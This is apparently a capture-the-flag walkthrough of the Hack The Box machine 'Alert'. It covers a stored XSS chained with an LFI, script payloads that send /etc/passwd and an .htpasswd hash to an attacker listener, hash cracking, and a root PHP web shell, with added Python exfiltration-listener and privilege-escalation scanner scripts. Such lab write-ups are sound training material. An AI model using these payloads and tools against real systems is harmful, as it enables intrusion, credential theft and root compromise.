Alert – Hack The Box – @lautarovculic

User.txt

Start with a full TCP port scan, with default scripts and version detection:

sudo nmap -p- -T4 --min-rate 2500 -sSCV -vvv 10.129.177.186

Output:

PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa REDACTED
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 REDACTED
|   256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 REDACTED
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

Only SSH and HTTP are exposed, and the web server redirects to alert.htb, so add that name to /etc/hosts (only tee needs root; echo does not):

echo "10.129.177.186 alert.htb" | sudo tee -a /etc/hosts

The site is a markdown viewer.

Browse the functionality and watch the requests in Burp Suite. If we upload a test.md containing

# h1
## h2

it is rendered back to us when we press the View Markdown button, and the rendered page can be shared via a link.

The markdown is rendered as HTML without any sanitisation, so anyone who opens the shared link executes our JavaScript: a stored XSS. A test.md with this payload pops an alert:

<img src="x" onerror="alert('XSS')">

or a markdown link whose target is a javascript: URL:

[Click me](javascript:alert('XSS'))

There is also an LFI: messages.php takes a file parameter and reads that path from disk. Because our script runs in the browser of whoever opens the shared link, we can chain the two: the injected script fetches the file through messages.php and sends the result, base64-encoded, to a listener we control.

First start the listener on the attacking machine (10.10.14.37 is the attacker's VPN address):

sudo python3 -m http.server 80

Then upload a .md file with this content:

<script>
fetch('/messages.php?file=../../../etc/passwd').then(r => r.text()).then(d => fetch('http://10.10.14.37/?data=' + btoa(d)));
</script>

The response contains the share link for the uploaded file:

<a class="share-button" href="http://alert.htb/visualizer.php?link_share=67424552eda2d9.48939714.md" target="_blank">Share Markdown</a>

Submit that link through the contact form. When it is opened on the target side, our listener receives the contents of /etc/passwd as base64 in the data parameter; decoding it reveals the user albert.

The same chain reads the Apache .htpasswd of the statistics.alert.htb vhost, which holds albert's password hash. The upload request as captured in Burp Suite:

POST /visualizer.php HTTP/1.1
Host: alert.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------37350420874820472663516859324
Content-Length: 407
Origin: http://alert.htb
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://alert.htb/index.php?page=alert
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------37350420874820472663516859324
Content-Disposition: form-data; name="file"; filename="exploit2.md"
Content-Type: text/markdown

<script>
fetch('/messages.php?file=../../../../../../var/www/statistics.alert.htb/.htpasswd').then(r => r.text()).then(d => fetch('http://10.10.14.37/?data=' + btoa(d)));
</script>

-----------------------------37350420874820472663516859324--

The listener receives a second callback with albert's hash:

10.129.177.186 - - [23/Nov/2024 18:12:58] "GET /?data=PHByZT5hbGJlcnQ6JGFwcjEkYk1vUkJKT2ckaWdHOFdCdFExeFlEVFFkTGpTV1pRLwo8L3ByZT4K HTTP/1.1" 200

Base64-decoding the data parameter gives <pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/</pre>, so the hash is:

$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
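Reading base64 out of the access log by hand gets old after the second callback. The following is an added example, not code from the original write-up: a drop-in replacement for the bare python3 -m http.server 80 that decodes the data parameter the payload sends (fetch('http://<attacker>/?data=' + btoa(d))) and prints the recovered file, flagging any Apache $apr1$ htpasswd entries in it. The listen port (80, as used above) is an assumption and can be overridden on the command line.

```python
#!/usr/bin/env python3
"""Listener for the XSS -> LFI exfiltration chain against alert.htb.

Added example, not code from the original write-up. The payload calls
fetch('http://<attacker>/?data=' + btoa(d)); this handler base64-decodes
the `data` parameter and prints the recovered file instead of leaving an
opaque string in the access log. Listen port 80 is an assumption.
"""
import base64
import binascii
import re
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# One user:hash line in htpasswd format with an Apache MD5 hash (hashcat -m 1600).
HTPASSWD_RE = re.compile(r"^([^:\s<>]+):(\$apr1\$[^\s<]+)$", re.MULTILINE)


def decode_exfil(request_path: str) -> Optional[str]:
    """Decode the base64 `data` parameter of a request path such as
    '/?data=PHByZT5h...'; return None if it is missing or not valid base64."""
    query = urlsplit(request_path).query
    for pair in query.split("&"):
        key, _, value = pair.partition("=")  # keep any '=' padding in the value
        if key != "data":
            continue
        # btoa() output is not URL-encoded by the payload, so '+' arrives
        # literally; undo a parser that already turned '+' into a space.
        value = value.replace(" ", "+")
        value += "=" * (-len(value) % 4)  # re-add padding if a proxy dropped it
        try:
            return base64.b64decode(value, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return None
    return None


def extract_htpasswd(text: str) -> List[Tuple[str, str]]:
    """Return (user, hash) pairs from decoded output, ignoring HTML such as <pre>."""
    return HTPASSWD_RE.findall(re.sub(r"<[^>]+>", "", text))


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        decoded = decode_exfil(self.path)
        if decoded is None:
            self.send_response(404)
            self.end_headers()
            return
        print(f"\n[+] {self.client_address[0]} exfiltrated {len(decoded)} bytes:")
        sys.stdout.write(decoded if decoded.endswith("\n") else decoded + "\n")
        for user, pw_hash in extract_htpasswd(decoded):
            print(f"[+] htpasswd entry: {user}:{pw_hash}  -> hashcat -m 1600")
        # Empty 200 so the victim's browser sees nothing unusual.
        self.send_response(200)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.end_headers()


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80
    print(f"[*] listening on 0.0.0.0:{port}")
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Run it with sudo on the attacking host in place of http.server; fed the request logged above, it prints the <pre>albert:$apr1$...</pre> block and the ready-to-crack user:hash line.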
The $apr1$ prefix marks an Apache MD5 (md5apr1) hash, which is hashcat mode 1600:

hashcat -m 1600 -a 0 hash.txt /usr/share/seclists/rockyou.txt

The password is manchesterunited. Log in via SSH:

ssh albert@10.129.177.186

and read the user flag:

albert@alert:~$ cat user.txt
daf53c0********3e8ee81c
albert@alert:~$

Root.txt

Running netstat -nat on the box shows a service bound only to localhost on port 8080:

Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN

ps aux | grep 8080 reveals what is behind it:

root         977  0.0  0.6 206768 25068 ?        Ss   Nov21   0:05 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

root is running PHP's built-in web server with /opt/website-monitor as its document root. Listing that directory:

albert@alert:/opt/website-monitor$ ls -la
total 96
drwxrwxr-x 7 root root        4096 Oct 12 01:07 .
drwxr-xr-x 4 root root        4096 Oct 12 00:58 ..
drwxrwxr-x 2 root management  4096 Nov 23 21:34 config

id shows that albert is a member of the management group, and config is group-writable by management (drwxrwxr-x root management), so we can read and write files in it.

The built-in server executes any .php file it serves, and it runs as root, so dropping a PHP file into config gives us code execution as root. A minimal web shell that reads the flag, saved as /opt/website-monitor/config/shell.php:

<?php system('cat /root/root.txt');?>

Request it through the loopback listener with curl:

curl http://127.0.0.1:8080/config/shell.php

Output:

albert@alert:/opt/website-monitor/config$ curl http://127.0.0.1:8080/config/shell.php
73c4e2*************025bf8f2d
albert@alert:/opt/website-monitor/config$
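The root step is an instance of a general pattern: a PHP built-in server running as one user with a document root another user can write to. The following is an added example, not code from the write-up, that looks for that pattern on any box. It parses ps aux output for php -S host:port -t docroot processes owned by someone else and walks each document root for directories the current user can write to; any .php dropped there runs as the server's user when requested. SAMPLE_PS is the process line from above, reused here as constructed input so the parser can be exercised offline.

```python
#!/usr/bin/env python3
"""Find PHP built-in servers whose document root the current user can write to.

Added example, not part of the original write-up. Given `ps aux` output it
lists `php -S host:port -t docroot` processes run by another user, then
reports directories under each docroot that are writable by us. Any .php
placed there executes as the server's user when requested over its port,
which is exactly the /opt/website-monitor/config situation above.
"""
import getpass
import os
import shlex
import subprocess
from typing import List, NamedTuple

# Constructed input: the header line plus the single process line from the write-up.
SAMPLE_PS = (
    "USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n"
    "root         977  0.0  0.6 206768 25068 ?        Ss   Nov21   0:05 "
    "/usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor\n"
)


class PhpServer(NamedTuple):
    user: str
    pid: int
    host: str
    port: int
    docroot: str


def find_php_servers(ps_output: str) -> List[PhpServer]:
    """Parse `ps aux` text and return every `php -S` built-in server in it."""
    servers: List[PhpServer] = []
    for line in ps_output.splitlines():
        cols = line.split(None, 10)  # ps aux prints 11 columns; the 11th is the full command
        if len(cols) < 11 or not cols[1].isdigit():
            continue  # header line or something that is not a process row
        try:
            argv = shlex.split(cols[10])
            if not os.path.basename(argv[0]).startswith("php") or "-S" not in argv:
                continue
            listen = argv[argv.index("-S") + 1]
            host, _, port = listen.rpartition(":")
            # -t selects the document root; without it PHP serves the process's
            # working directory, which ps does not show, so leave it empty.
            docroot = argv[argv.index("-t") + 1] if "-t" in argv else ""
            servers.append(PhpServer(cols[0], int(cols[1]), host or "0.0.0.0", int(port), docroot))
        except (IndexError, ValueError):
            continue  # malformed or truncated command line; skip it
    return servers


def writable_subdirs(docroot: str) -> List[str]:
    """Directories at or below docroot in which the current user can create files."""
    if not docroot:
        return []
    return sorted(d for d, _subdirs, _files in os.walk(docroot) if os.access(d, os.W_OK | os.X_OK))


def main() -> None:
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True).stdout
    me = getpass.getuser()
    for srv in find_php_servers(ps):
        if srv.user == me:
            continue  # already running as us; nothing to escalate to
        print(f"[*] php -S {srv.host}:{srv.port} (pid {srv.pid}) runs as {srv.user}, docroot {srv.docroot or '?'}")
        for d in writable_subdirs(srv.docroot):
            rel = os.path.relpath(d, srv.docroot)
            url_dir = "" if rel == "." else rel + "/"
            print(f"    [+] writable: {d}  -> drop x.php here, then curl http://{srv.host}:{srv.port}/{url_dir}x.php")


if __name__ == "__main__":
    main()
```

Run as albert on the box it reports php -S 127.0.0.1:8080 running as root with /opt/website-monitor/config writable, which is the whole privilege escalation in one line of output.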

I hope you found it useful (:
